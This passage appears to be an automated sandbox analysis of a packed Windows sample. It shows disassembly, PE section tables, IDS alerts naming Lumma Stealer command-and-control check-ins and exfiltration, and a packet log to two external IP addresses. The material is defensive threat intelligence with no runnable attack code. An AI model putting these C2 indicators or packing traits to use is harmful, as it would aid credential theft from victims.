                                                                                                                                                                              add byte ptr [eax], cl
                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add ecx, dword ptr [edx]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              pop ds
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [ecx], ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [edi], al
                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              pop es
                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add bh, bh
                                                                                                                                                                              inc dword ptr [eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [ecx+00000080h], dh
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              0x10000x510000x248001be40c9159d050d55534cec456fb1205False0.997418129280822data7.981487191884987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              elrlqfzp0x540000x2b10000x2b020025471db1d32fb1fbe840d0d5c2b299a6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              bgznktwl0x3050000x10000x4005fe07633e656140036d9ec143d69a67aFalse0.8203125data6.323311416223315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .taggant0x3060000x30000x22000df22e67b98e9c0203da8a9b5c1f81cdFalse0.08191636029411764DOS executable (COM)0.914158416188384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              DLLImport
                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-12-23T08:31:24.358092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049709172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:25.370653+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049709172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:25.370653+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049709172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:26.603782+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049715172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:27.384459+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049715172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:27.384459+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049715172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:29.217430+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049721172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:31.800217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049727172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:34.383974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049733172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:37.289695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049741172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:38.056395+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049741172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:39.873395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049752172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:45.261319+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049763172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:46.020963+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049763172.67.150.173443TCP
                                                                                                                                                                              2024-12-23T08:31:47.601922+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049769185.166.143.49443TCP
                                                                                                                                                                              2024-12-23T08:31:50.046654+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.104977552.217.136.89443TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 23, 2024 08:31:23.135504007 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:23.135621071 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:23.135714054 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:23.136972904 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:23.137018919 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:24.358017921 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:24.358092070 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:24.360940933 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:24.360963106 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:24.361298084 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:24.408504963 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:24.408550978 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:24.408687115 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.370681047 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.370942116 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.371067047 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.372433901 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.372479916 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.372509003 CET49709443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.372539997 CET44349709172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.383436918 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.383470058 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:25.383550882 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.383908987 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.383940935 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.603604078 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.603781939 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.605078936 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.605088949 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.605411053 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.606740952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.606740952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.606817961 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384543896 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384761095 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384836912 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.384846926 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390829086 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390928030 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390975952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.390984058 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.391030073 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.399245977 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.407752037 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.407898903 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.407907009 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.416079044 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.416176081 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.416184902 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.471201897 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.504060030 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.549372911 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.576293945 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580102921 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580250025 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.580260038 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580343008 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580523968 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587794065 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587794065 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587806940 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.587816954 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.994240046 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994255066 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.994328976 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994676113 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994685888 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.217283010 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.217430115 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.218713045 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.218724012 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.219556093 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.220848083 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.221693993 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.221754074 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485491991 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485789061 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485872984 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.485941887 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.485966921 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.581231117 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581288099 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.581407070 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581691980 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581708908 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.800132990 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.800216913 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.801487923 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.801496983 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.801752090 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.802970886 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.803128958 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.803164959 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.803229094 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.843332052 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962543964 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962641001 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962752104 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:32.962918997 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:32.962943077 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:33.171684980 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.171740055 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:33.171885967 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.172177076 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.172189951 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.383820057 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.383974075 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.385225058 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.385232925 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.385449886 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.386794090 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386871099 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386892080 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.386955023 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386961937 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.540949106 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.541194916 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.541290045 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:35.541373014 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:35.541389942 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:36.076812029 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.076853991 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:36.076978922 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.077394009 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.077409029 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.289410114 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.289695024 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.291327000 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.291337013 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.291579008 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.292877913 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.292877913 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.292912006 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056385040 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056529045 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056582928 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.056706905 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.056725025 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.654819012 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.654856920 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.655008078 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.655333996 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.655345917 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.873292923 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.873394966 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.874722958 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.874738932 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.875068903 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.884654045 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.885474920 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.885533094 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.885657072 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.885689020 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.885819912 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.885986090 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.886126995 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.886146069 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.886322975 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.886344910 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.886548996 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.886570930 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.886583090 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.886662006 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.886765003 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.886807919 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.927331924 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.927923918 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.927982092 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.927999020 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.975328922 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:39.975662947 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.975716114 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:39.975740910 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:40.019361019 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:40.246726036 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:44.030294895 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:44.030575991 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:44.030666113 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:44.030751944 CET49752443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:44.030791044 CET44349752172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:44.040857077 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:44.040900946 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:44.041115999 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:44.041302919 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:44.041320086 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:45.261203051 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:45.261318922 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:45.266860008 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:45.266881943 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:45.267110109 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:45.268637896 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:45.268662930 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:45.268708944 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.020927906 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.021042109 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.021123886 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:46.021318913 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:46.021332026 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.021348953 CET49763443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:46.021357059 CET44349763172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.210850000 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:46.211002111 CET44349769185.166.143.49192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.211076021 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:46.211508989 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:46.211530924 CET44349769185.166.143.49192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:47.601777077 CET44349769185.166.143.49192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:47.601922035 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:47.603660107 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:47.603693008 CET44349769185.166.143.49192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:47.604012966 CET44349769185.166.143.49192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:47.605499983 CET49769443192.168.2.10185.166.143.49
                                                                                                                                                                              Dec 23, 2024 08:31:47.647358894 CET44349769185.166.143.49192.168.2.10
